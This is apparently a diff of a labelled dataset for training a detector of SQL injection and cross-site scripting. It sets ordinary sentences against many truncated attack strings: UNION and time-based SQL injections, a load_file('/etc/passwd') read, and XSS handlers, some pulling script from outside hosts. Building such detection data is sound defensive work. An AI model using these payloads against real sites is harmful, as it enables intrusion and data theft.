@@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10634 -Select the appropriate app for the task.,0,normal,24257 -<th onpointerdown=alert(1)>XSS</th>,1,XSS,7099 -1'|| ( select 'sbft' where 8748 = 8748,2,SQLi,15245 -<thead onfocusout=alert(1) tabindex=1 id=x></thead,1,XSS,7874 -"1"" or 4411 = ( select count ( * ) from sysusers as",2,SQLi,21248 -"1"" or 4411 = ( select count ( * ) from sysusers as",2,SQLi,19899 -"1"" and elt ( 1210 = 1210,sleep ( 5 ) ) and ""zhxm"" ",2,SQLi,18549 -"1%"" ) ) and 5556 = ( select count ( * ) from all_u",2,SQLi,17260 -Select the best caterer.,0,normal,24370 --9770' ) ) as ovhh where 7903 = 7903 or 5023 = ctx,2,SQLi,19111 --8131' ) ) or 9680 = 3467,2,SQLi,13397 -select ( case when ( 6434 = 3877 ) then 6434 else ,2,SQLi,12539 -or 'whatever' in ('whatever'),2,SQLi,10122 -"<script onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,4902 -"1' ) where 6056 = 6056 or row ( 1045,7562 ) > ( se",2,SQLi,15274 -The type of trust you select as a beneficiary matt,0,normal,25363 -"1"" ) as sstd where 9629 = 9629 or updatexml ( 1808",2,SQLi,18150 -"<dfn draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,5146 -select * from users where id = '1' or !<@ or 1 = 1,2,SQLi,11933 -<th onpointerup=alert(1)>XSS</th>,1,XSS,7285 -<applet onpointerout=alert(1)>XSS</applet>,1,XSS,5569 -<var onpointerleave=alert(1)>XSS</var>,1,XSS,1968 -1,0,normal,26665 -"exp/*<XSS STYLE='no\xss:noxss(""*//*"");",1,XSS,9377 -1'+ ( select uqdb where 3508 = 3508 or 4915 = ( se,2,SQLi,21671 -"{""id"":null,""firstName"":""Miki"",""lastName"":""Jiang"",""",0,normal,27468 -<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;,1,XSS,1635 -select * from users where id = '1' or \<\. union s,2,SQLi,12055 -"<image onpaste=""alert(1)"" contenteditable>test</im",1,XSS,7403 -1'+ ( select 'ezpy' where 5282 = 5282 order by 1#,2,SQLi,17124 -"1"" ) where 2016 = 2016 and ( 1547 = 2093 ) *2093--",2,SQLi,18267 -><script+src=https://www.meteoprog.ua/data/weather,1,XSS,9810 -"-6335"" ) ) ) union all select 3654--",2,SQLi,22303 -Create a memorable photograph.,0,normal,22742 -<svg><dl onload=alert(1)></dl>,1,XSS,3038 -<button onSyncRestored=javascript:alert(1)>,1,XSS,9672 +><script+src=https://suggest-shop.yahooapis.jp/Sho,1,XSS,9796 +"select * from users where id = 1 or ""1,"" or 1 = 1 ",2,SQLi,11843 +1' where 7613 = 7613,2,SQLi,19440 +1' ) ) as dqby where 9256 = 9256,2,SQLi,15624 +1,0,normal,26648 +"<meta HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascri",1,XSS,1498 +"Available in Playback Mode, the D-Lighting functio",0,normal,26337 +select * from users where id = 1 + \+%1 union sele,2,SQLi,11626 +"-2734' ) union all select 5510,5510,5510,5510,5510",2,SQLi,14244 +"<noframes onbeforecopy=""alert(1)"" contenteditable>",1,XSS,4888 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10636 +The age of a child will greatly affect which gift ,0,normal,25486 +<style>:target {color:red;}</style><html id=x styl,1,XSS,7101 +1' ) and 9254 = ( select count ( * ) from rdb$fiel,2,SQLi,17700 +"<tfoot oncopy=""alert(1)"" contenteditable>test</tfo",1,XSS,7876 +"{""id"":null,""name"":""main""}",0,normal,27511 +1' ) ) or 7552 = ( select count ( * ) from rdb$fie,2,SQLi,14525 +Select tutor.,0,normal,24718 +"1"" ) ) as xhat where 6674 = 6674 union all select ",2,SQLi,17258 +"1%"" ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ""%""",2,SQLi,19592 +1 ) ) and ( 3020 = 3020 ) *6703 and ( ( 3078 = 307,2,SQLi,19109 +"1"" ) ) or 7427 = dbms_pipe.receive_message ( chr (",2,SQLi,13390 +"-8454"" or 6872 = 6872",2,SQLi,21442 +"union select 1,load_file('/etc/passwd'),1,1,1;",2,SQLi,10124 +<ruby onpointerover=alert(1)>XSS</ruby>,1,XSS,4904 +1'|| ( select 'boib' where 9595 = 9595,2,SQLi,15266 +1 ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ,2,SQLi,16848 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13630 +<script onerror=alert(1) src=/></script>,1,XSS,5148 +select * from users where id = 1 + @<@# union sele,2,SQLi,11926 +<q onpointerup=alert(1)>XSS</q>,1,XSS,7287 +<slot onpointerup=alert(1)>XSS</slot>,1,XSS,5571 +"<dfn onmouseenter=""alert(1)"">test</dfn>",1,XSS,1969 +1'|| ( select 'gopc' where 7386 = 7386 and make_se,2,SQLi,21498 +feed:javascript:alert('Top Page Location: '+docume,1,XSS,9379 +"-1447"" union all select 3013,3013,3013,3013,3013,3",2,SQLi,19535 +"{""id"":null,""firstName"":""Miki"",""lastName"":""Jiang"",""",0,normal,27468 +<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&,1,XSS,1636 +1' ) ) as yyja where 4321 = 4321 or 8315 = ( selec,2,SQLi,17972 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7405 +1' ) where 3767 = 3767 and 6240 = ( 'qqpjq'|| ( se,2,SQLi,22035 +1' ) and 6510 = ( select count ( * ) from sysusers,2,SQLi,18265 +><script+src=https://api.userlike.com/api/chat/slo,1,XSS,9812 +"Identify, select and demonstrate understanding of ",0,normal,26060 +1,0,normal,26727 +"<dialog onmousedown=""alert(1)"">test</dialog>",1,XSS,3039 +<button onTrackChange=javascript:alert(1)>,1,XSS,9674 "<video><source onerror=""javascript:javascript:aler",1,XSS,623 -"<code onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,6247 +<sup onpointerup=alert(1)>XSS</sup>,1,XSS,6249 <IMG SRC=”javascript:alert(‘XSS’);”>,1,XSS,927 -<img src=x oneonerrorrror=alert(String.fromCharCod,1,XSS,9691 -"{""id"":null,""name"":""Suicune""}",0,normal,26992 -"-1203"" ) ) or 8571 = 8571--",2,SQLi,17387 -1'|| ( select 'vuku' where 3143 = 3143 waitfor del,2,SQLi,13376 -"1' union all select null,null--",2,SQLi,21705 -"1%"" and exp ( ~ ( select * from ( select concat ( ",2,SQLi,20017 -1 where 6523 = 6523 and 8594 = ( select 8594 from ,2,SQLi,16243 -Find data where applicable.,0,normal,23355 -">""><script src = 'http://www.site.com/XSS.js'></sc",1,XSS,1333 -"<link rel=import href=""data:text/html&comma;&lt;sc",1,XSS,9225 -<strong id=x tabindex=1 onactivate=alert(1)></stro,1,XSS,5150 -select,0,normal,26624 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10523 -<textarea onpointerout=alert(1)>XSS</textarea>,1,XSS,2689 -<script>alert(/XSS/)</script>,1,XSS,1715 -"-3518 ) union all select 1877,1877,1877,1877#",2,SQLi,19102 -"1 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14145 -"<canvas onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,2060 -AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,11754 -<dd onpointerout=alert(1)>XSS</dd>,1,XSS,6038 -"<dir onmousemove=""alert(1)"">test</dir>",1,XSS,8524 -<nextid onfocusout=alert(1) tabindex=1 id=x></next,1,XSS,3856 -1 or 5286 = ( select count ( * ) from all_users t1,2,SQLi,14763 -<shadow id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,8123 -"<dfn onmouseover=""alert(1)"">test</dfn>",1,XSS,7519 -"-5078 union all select 9708,9708--",2,SQLi,17687 -""",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20",2,SQLi,10908 -1' ) ) as xirr where 2425 = 2425,2,SQLi,18658 -hi' or 'a'='a,2,SQLi,10081 -"<video onloadeddata=alert(1)><source src=""validvid",1,XSS,8509 -select case when 9390 = 5752 then 1 else null end-,2,SQLi,14362 -<button onpointerenter=alert(1)>XSS</button>,1,XSS,7581 -"-1512 union all select 9013,9013,9013,9013#",2,SQLi,14663 -"-3261"" ) ) ) or 5023 = ctxsys.drithsx.sn ( 5023, (",2,SQLi,19636 -"1 ) ) and row ( 6237,7469 ) > ( select count ( * )",2,SQLi,18732 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7846 -"1' and elt ( 3247 = 3969,3969 ) and 'xcbm' like 'x",2,SQLi,18390 -Select improve.,0,normal,24619 -Democrats need to consider Trump's strengths as th,0,normal,26246 -"<sub draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,2819 --2648' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,13718 +><img src=x onerror=alert('XSS');>,1,XSS,9693 +Delete the extra spaces.,0,normal,22565 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17385 +"-7083"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,12971 +"1"" ) union all select null,null,null--",2,SQLi,21703 +The sliders won't let you select anything shorter ,0,normal,25373 +-8369 ) where 7234 = 7234 order by 1--,2,SQLi,18510 +Where's the motel?,0,normal,23547 +}</style><script>a=eval;b=alert;a(b(/XSS/.source)),1,XSS,1334 +"<maction actiontype=""statusline"" xlink:href=""javas",1,XSS,9227 +"<dd draggable=""true"" ondrag=""alert(1)"">test</dd>",1,XSS,5152 +select,0,normal,26621 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10525 +"<style>@keyframes x{}</style><time style=""animatio",1,XSS,2690 +; alert(1);,1,XSS,1716 +select sleep ( 5 ) and ( ( 'uyft' = 'uyft,2,SQLi,20388 +The Select Transactions of this society were colle,0,normal,25349 +"<rt onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2061 +"-4318"" ) as vpvt where 5543 = 5543 union all selec",2,SQLi,16955 +"<isindex onmouseenter=""alert(1)"">test</isindex>",1,XSS,6040 +<aside id=x tabindex=1 ondeactivate=alert(1)></asi,1,XSS,8526 +"<thead onmouseenter=""alert(1)"">test</thead>",1,XSS,3858 +"1"" where 9083 = 9083 and ( select 2* ( if ( ( sele",2,SQLi,14756 +"<xmp onmousedown=""alert(1)"">test</xmp>",1,XSS,8125 +<b id=x tabindex=1 onfocusin=alert(1)></b>,1,XSS,7521 +1'|| ( select 'tzxr' from dual where 2934 = 2934 a,2,SQLi,17471 +"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20",2,SQLi,10910 +1 ) as caoa where 6139 = 6139 union all select nul,2,SQLi,18919 +or 3=3,2,SQLi,10083 +<shadow id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,8511 +"1%"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""%"" ",2,SQLi,19049 +<svg><em onload=alert(1)></em>,1,XSS,7583 +"1"" and 4386 = utl_inaddr.get_host_address ( chr ( ",2,SQLi,14656 +"1' ) where 6489 = 6489 or updatexml ( 1808,concat ",2,SQLi,19634 +1 ) as uuro where 6784 = 6784,2,SQLi,18730 +"<li onmousemove=""alert(1)"">test</li>",1,XSS,7848 +1%' order by 1--,2,SQLi,18865 +declare @q nvarchar ( 200 ) 0x730065006c00650063 .,2,SQLi,11851 +Demonstrate the ability to select relevant princip,0,normal,26243 +"<dl onmouseover=""alert(1)"">test</dl>",1,XSS,2820 +1' union all select null#,2,SQLi,14227 "<script>alert(""XSS"");</script>&search=1",1,XSS,951 -<style>:target {color: red;}</style><header id=x s,1,XSS,5363 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,12236 -Select the perfect song.,0,normal,24313 -1 ) ) as bvij where 7913 = 7913,2,SQLi,20760 -Macy's is offering major savings across department,0,normal,25897 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11891 -1' in boolean mode ) and char ( 107 ) ||char ( 121,2,SQLi,20548 -"-7016%"" ) ) union all select 8847,8847,8847--",2,SQLi,19840 -"<script onclick=""alert(1)"">test</script>",1,XSS,6386 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,14356 -"\"";;alert(';XSS';);//",1,XSS,1640 -"<style>@keyframes x{}</style><small style=""animati",1,XSS,5201 -1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = ,2,SQLi,13762 --5336' ) where 8691 = 8691 or 3608 = 1887--,2,SQLi,16229 -<marquee onpointerup=alert(1)>XSS</marquee>,1,XSS,6452 -"1 where 8273 = 8273 union all select null,null,nul",2,SQLi,18504 -"1"" ) where 9545 = 9545 and 9198 = 9198--",2,SQLi,21694 -"-3393"" ) ) union all select 5954,5954,5954,5954,59",2,SQLi,19180 -"{""id"":null,""firstName"":""Pranava"",""lastName"":""Sheor",0,normal,27361 -"1 ) where 5615 = 5615 and row ( 6237,7469 ) > ( se",2,SQLi,20925 -1'|| ( select 'xdzp' from dual where 5786 = 5786 a,2,SQLi,14536 -"1"" ) where 5358 = 5358",2,SQLi,18917 -"<keygen draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,7317 -<area id=x tabindex=1 onactivate=alert(1)></area>,1,XSS,1966 -There are a lot of strollers out there that will h,0,normal,25335 -Select a destination for the trip.,0,normal,24009 -Select a travel destination to visit.,0,normal,24073 --1602' or 3038 = 3038,2,SQLi,17627 -<video autoplay controls onseeking=alert(1)><sourc,1,XSS,2026 -1'|| ( select 'dbxr' where 4014 = 4014 and 9660 = ,2,SQLi,14836 -"-3721' ) union all select 9050,9050--",2,SQLi,12189 +"<slot onmouseenter=""alert(1)"">test</slot>",1,XSS,5365 +#ERROR!,2,SQLi,22525 +1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18747 +"1' ) where 6328 = 6328 union all select null,null,",2,SQLi,20758 +"1"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,12621 +Select reboot.,0,normal,24628 +1' ) rlike ( select ( case when ( 2671 = 4485 ) th,2,SQLi,21670 +"1' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,22118 +<rtc onpointerup=alert(1)>XSS</rtc>,1,XSS,6388 +1 where 6369 = 6369 procedure analyse ( extractval,2,SQLi,16482 +"<;/TITLE>;<;SCRIPT>;alert(""XSS"");<;/SCRIPT>;",1,XSS,1641 +"<shadow onmouseleave=""alert(1)"">test</shadow>",1,XSS,5203 +1'|| ( select 'ocmk' from dual where 3961 = 3961 o,2,SQLi,16193 +"select * from generate_series ( 7536,7536,case whe",2,SQLi,15345 +<base onpointerdown=alert(1)>XSS</base>,1,XSS,6454 +"1' procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,17731 +1' where 9241 = 9241 or 4915 = ( select count ( * ,2,SQLi,16847 +1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,19178 +"{""id"":null,""firstName"":""Hu"",""lastName"":""Jiakang"",""",0,normal,27248 +from,0,normal,26513 +"-9764' where 1266 = 1266 or elt ( 4069 = 6162,6162",2,SQLi,14529 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18915 +"<bgsound onbeforepaste=""alert(1)"" contenteditable>",1,XSS,7319 +<hr onpointerout=alert(1)>XSS</hr>,1,XSS,1967 +"end and ( ""nuix"" like ""nuix",2,SQLi,13498 +Select a book for your reading pleasure.,0,normal,24006 +"{""id"":null,""name"":""needed stretch""}",0,normal,27221 +"1%"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) ",2,SQLi,19192 +"<i onmouseup=""alert(1)"">test</i>",1,XSS,2027 +"-6733' ) where 4024 = 4024 union all select 4024,4",2,SQLi,14829 +"-4984%"" ) ) ) union all select 6980,6980,6980,6980",2,SQLi,12182 "{""id"":null,""firstName"":""Mike"",""lastName"":""Bane"",""a",0,normal,27597 -1 where 8333 = 8333 and 6055 = ctxsys.drithsx.sn (,2,SQLi,16004 -<table id=x tabindex=1 ondeactivate=alert(1)></tab,1,XSS,4964 -<img2 onpointerup=alert(1)>XSS</img2>,1,XSS,4128 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--",2,SQLi,10574 -Select maximize.,0,normal,24622 -"<section ondblclick=""alert(1)"">test</section>",1,XSS,7682 -1 ) ( select ( case when ( 5451 = 5451 ) then rege,2,SQLi,17611 -"<span ondblclick=""alert(1)"">test</span>",1,XSS,2929 -"-5322"" union all select 6494,6494,6494,6494,6494,6",2,SQLi,18479 -"<dialog draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,1791 -<dialog id=x tabindex=1 ondeactivate=alert(1)></di,1,XSS,6955 -"1"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,13298 -"1, ( select ( case when ( 5141 = 5141 ) then ( asc",2,SQLi,21923 -"waitfor delay '0:0:5' and ( ""%"" = """,2,SQLi,15818 -1' ) ( select ( case when ( 4587 = 4587 ) then reg,2,SQLi,15284 -"<style>@keyframes x{}</style><basefont style=""anim",1,XSS,7027 -"1"" and 9198 = 9198--",2,SQLi,13926 -"<data oncopy=""alert(1)"" contenteditable>test</data",1,XSS,6708 -"1"" ) ) as ftts where 3671 = 3671 and 4241 = conver",2,SQLi,21481 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,14042 -<;IMG SRC=javascript:alert(';XSS';)>;,1,XSS,1594 -"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,14650 -<style>:target {color: red;}</style><details id=x ,1,XSS,4384 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7528 +1'+ ( select qugu where 2287 = 2287 order by 1#,2,SQLi,15996 +<svg><small onload=alert(1)></small>,1,XSS,4966 +<output id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,4130 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-",2,SQLi,10576 +where,0,normal,26525 +<content onpointerup=alert(1)>XSS</content>,1,XSS,7684 +Save up to 35% off select on Select Polywood Patio,0,normal,25714 +"<blink onmouseover=""alert(1)"">test</blink>",1,XSS,2930 +She'll select soon.,0,normal,24428 +<iframe onblur=alert(1) id=x><input autofocus>,1,XSS,1792 +"<source onmouseleave=""alert(1)"">test</source>",1,XSS,6957 +The feature will launch in select countries later ,0,normal,25450 +1 ) as vqdh where 1603 = 1603,2,SQLi,15842 +1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'rozr' like ',2,SQLi,13725 +"1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a7",2,SQLi,14781 +<noframes onfocusout=alert(1) tabindex=1 id=x></no,1,XSS,7029 +"1"" and 8514 = ( select count ( * ) from domain.dom",2,SQLi,13919 +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,6710 +"1"" ) where 9621 = 9621",2,SQLi,16998 +1 where 6036 = 6036 and 7533 = 7533--,2,SQLi,14035 +"<;IMG DYNSRC="";javascript:alert(';XSS';);"";>;",1,XSS,1595 +1 or 4411 = ( select count ( * ) from sysusers as ,2,SQLi,14643 +<basefont id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,4386 +"<main onclick=""alert(1)"">test</main>",1,XSS,7530 "<div style=""font-family:foo}color=red;"">XXX",1,XSS,701 --3775' ) as rqet where 7092 = 7092 or elt ( 1032 =,2,SQLi,20613 -1 ) ) ) and 3580 = ( select count ( * ) from domai,2,SQLi,12515 -"1%' ) ) and 8148 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,19571 -"1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a7",2,SQLi,16742 -select * from users where id = 1 +$+ or 1 = 1 -- 1,2,SQLi,11378 -"<span onkeydown=""alert(1)"" contenteditable>test</s",1,XSS,4030 -Open the Preview app on your Mac and select the fi,0,normal,25810 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10615 +1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,20611 +"-4291"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,12114 +"-4901' union all select 1536,1536,1536,1536,1536,1",2,SQLi,15958 +"1"" ) as wvxt where 7321 = 7321 and 8312 = dbms_pip",2,SQLi,16740 +select * from users where id = '1' or ||/1 = 1 uni,2,SQLi,11380 +"<tr onmouseover=""alert(1)"">test</tr>",1,XSS,4032 +"-2725"" union all select 3671,3671,3671,3671,3671#",2,SQLi,19119 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10617 "<STYLE TYPE=""text/javascript"">javascript:alert(1);",1,XSS,765 -"1"" ) rlike ( select ( case when ( 8732 = 6244 ) th",2,SQLi,16258 --8042 ) as zhoq where 2120 = 2120 union all select,2,SQLi,18293 -"<IMG SRC=""jav&#x0A;ascript:alert('');"">",1,XSS,4343 +1'|| ( select 'hafu' where 6226 = 6226,2,SQLi,16250 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,16878 +"<style>@keyframes x{}</style><script style=""animat",1,XSS,4345 "<IFRAME SRC=""javascript:javascript:alert(1);""></IF",1,XSS,759 -1 ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) |,2,SQLi,21305 -"<BGSOUND SRC=""javascript:alert('');"">",1,XSS,6599 -""" waitfor delay '0:0:20' --",2,SQLi,10924 +1 ) ) as quap where 7625 = 7625,2,SQLi,13023 +"<select onkeypress=""alert(1)"" contenteditable>test",1,XSS,6601 +) waitfor delay '0:0:20' --,2,SQLi,10926 "{""id"":null,""firstName"":""Jimmy"",""lastName"":""Lim"",""s",0,normal,27611 -"-1059"" ) union all select 1276,1276,1276,1276,1276",2,SQLi,20888 +"1"" and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,20886 "<xss id=x style=""transition:outline 1s"" ontransiti",1,XSS,39 -"<fieldset oncontextmenu=""alert(1)"">test</fieldset>",1,XSS,3614 -<button onProgress=javascript:alert(1)>,1,XSS,9648 -1' in boolean mode ) and 2388 = benchmark ( 500000,2,SQLi,19726 -1'|| ( select 'ltqo' where 9080 = 9080 and 3202 = ,2,SQLi,15511 -"<style>@keyframes slidein {}</style><rtc style=""an",1,XSS,5275 -( select ( case when ( 3592 = 3592 ) then 3592 els,2,SQLi,15661 -<option id=x tabindex=1 onfocus=alert(1)></option>,1,XSS,7204 -"<style>@keyframes x{}</style><isindex style=""anima",1,XSS,2895 -"<br draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,5047 --6792 ) ) as zlho where 4758 = 4758 or 2724 in ( (,2,SQLi,18112 -"<style>@keyframes x{}</style><noembed style=""anima",1,XSS,4588 -"1"" ) union all select null,null,null,null--",2,SQLi,14735 -"{""id"":null,""name"":""MagnaGarurumon (SV)""}",0,normal,27156 -1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,13341 -"<sCrIpt/""<a""/srC=data:="".<a,[8].some(confirm)>",1,XSS,9246 -"{""id"":null,""firstName"":""Rita"",""lastName"":""Leng"",""s",0,normal,27238 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,17511 -select,0,normal,26604 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8699 -"{""id"":null,""name"":""soft""}",0,normal,27197 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,13790 -<div onpointerdown=alert(1)>XSS</div>,1,XSS,7573 -<xmp id=x tabindex=1 onfocusin=alert(1)></xmp>,1,XSS,6302 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20835 -"1"" ) where 3943 = 3943 and 8312 = dbms_pipe.receiv",2,SQLi,16040 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2808 --8982'+ ( select anyd where 5358 = 5358 union all ,2,SQLi,21019 -She picked up some groceries from the market.,0,normal,23745 -1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ,2,SQLi,12291 -"<noframes onmouseup=""alert(1)"">test</noframes>",1,XSS,8497 -TRUE,0,normal,23239 -1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,12413 --8004%' ) or ( 2301 = 7504 ) *7504 and ( '%' = ',2,SQLi,16665 -<form><input formaction=javascript:alert(1) type=s,1,XSS,9179 -"Click into the Notes Panel, open the notes you wan",0,normal,26279 -Its companion volume of Select Charters and other ,0,normal,25942 -1' where 8729 = 8729,2,SQLi,18776 +<style>:target {color: red;}</style><font id=x sty,1,XSS,3616 +<button onReadyStateChange=javascript:alert(1)>,1,XSS,9650 +"-9526 where 5734 = 5734 or elt ( 1032 = 1032,3623 ",2,SQLi,18973 +1' where 9583 = 9583 and 5319 = 7670#,2,SQLi,16457 +"<center draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5277 +-9217 or 9323 = 9323#,2,SQLi,15653 +"<tfoot oncontextmenu=""alert(1)"">test</tfoot>",1,XSS,7206 +<img src/onerror=alert(1)>,1,XSS,2896 +<del onfocusout=alert(1) tabindex=1 id=x></del><in,1,XSS,5049 +1%' or 5356 = ( select count ( * ) from sysusers a,2,SQLi,18110 +"<em onmouseleave=""alert(1)"">test</em>",1,XSS,4590 +-3125' ) ) ) order by 1#,2,SQLi,14728 +"1' ) ) ) union all select null,null,null--",2,SQLi,16370 +"1%"" waitfor delay '0:0:5' and ""%"" = """,2,SQLi,15262 +<sCriPt/src=//14.rs?,1,XSS,9248 +-7430' ) as xfah where 1596 = 1596 or 4144 = ( sel,2,SQLi,14559 +-6327' ) ) union all select 2685--,2,SQLi,19410 +"1"" ) as assu where 7521 = 7521 or 5356 = ( select ",2,SQLi,13418 +"<bdi onclick=""alert(1)"">test</bdi>",1,XSS,8701 +"{""id"":null,""name"":""Charizard""}",0,normal,27195 +"-3834' ) ) ) union all select 8313,8313--",2,SQLi,15373 +"<embed onmousemove=""alert(1)"">test</embed>",1,XSS,7575 +"<meta onmousemove=""alert(1)"">test</meta>",1,XSS,6304 +"1%"" or 2367 = ( select count ( * ) from rdb$fields",2,SQLi,20833 +1 ) where 6304 = 6304,2,SQLi,21180 +"<strong draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,2809 +1'+ ( select 'wyed' where 9896 = 9896,2,SQLi,21017 +"1 ) ) ) union all select null,null,null,null--",2,SQLi,21082 +1' and ( select 2* ( if ( ( select * from ( select,2,SQLi,12284 +"<command oncopy=""alert(1)"" contenteditable>test</c",1,XSS,8499 +Where can I select a movie for our movie night?,0,normal,23870 +"1"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97",2,SQLi,12406 +"-1043"" ) where 4207 = 4207 or 2724 in ( ( char ( 1",2,SQLi,22240 +"<handler xmlns:ev=""http://www.w3.org/2001/xml-even",1,XSS,9181 +Click the photo or photos you want to download to ,0,normal,26276 +It's not clear how Twitter plans to select its tes,0,normal,25939 +1'+ ( select jrmz where 4762 = 4762 and elt ( 9588,2,SQLi,21020 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&,1,XSS,253 -"<li onpaste=""alert(1)"" contenteditable>test</li>",1,XSS,6861 -"<track draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,5083 +"<style>@keyframes x{}</style><html style=""animatio",1,XSS,6863 +"<hgroup onkeypress=""alert(1)"" contenteditable>test",1,XSS,5085 "<a href=""\xE2\x80\xAFjavascript:javascript:alert(1",1,XSS,512 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,21339 -1 where 6077 = 6077 or char ( 119 ) ||char ( 100 ),2,SQLi,14762 -( 1589 = 1589 ) *1,2,SQLi,12118 -"1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,19264 -"<footer onclick=""alert(1)"">test</footer>",1,XSS,3334 -Select your plea.,0,normal,24940 -1%' or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,13161 -"<i onmousedown=""alert(1)"">test</i>",1,XSS,8406 -1'+ ( select pdfv where 1172 = 1172 and updatexml ,2,SQLi,22386 -"-5073"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11",2,SQLi,15496 -"<a class=bar href=""http://www.example.org"">www.exa",1,XSS,9061 +"-4135' ) ) ) union all select 4413,4413,4413#",2,SQLi,21337 +-1949 ) as smyn where 4066 = 4066 union all select,2,SQLi,14755 +"-6249' ) ) ) union all select 5136,5136,5136,5136,",2,SQLi,16837 +1'+ ( select 'qbdh' where 4006 = 4006 and 7533 = 7,2,SQLi,17478 +"<style>@keyframes slidein {}</style><ruby style=""a",1,XSS,3336 +Select your hope.,0,normal,24937 +"1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,13154 +<sub onpointerout=alert(1)>XSS</sub>,1,XSS,8408 +"select * from generate_series ( 1431,1431,case whe",2,SQLi,20561 +"{""id"":null,""firstName"":""Ben"",""lastName"":""Chia"",""sp",0,normal,26854 +"<a href=http://foo.bar/#x=`y></a><img alt=""`><img ",1,XSS,9063 "<LAYER SRC=""%(scriptlet)s""></LAYER>",1,XSS,751 -1'+ ( select yjyp where 9696 = 9696,2,SQLi,15694 -"-7876%' ) union all select 3909,3909,3909,3909,390",2,SQLi,16589 -<style>@keyframes slidein {}</style><content style,1,XSS,2349 -"<body onhashchange=""alert(1)"">",1,XSS,6075 -"1%"" ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ",2,SQLi,18199 -"<label draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,8935 -1,0,normal,26713 -1%' and 7366 = 9197#,2,SQLi,20202 -"""));waitfor delay '0:0:__TIME__'--",2,SQLi,10843 --1157 ) ) as sxie where 7118 = 7118 or 5023 = ctxs,2,SQLi,21739 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,17172 -To 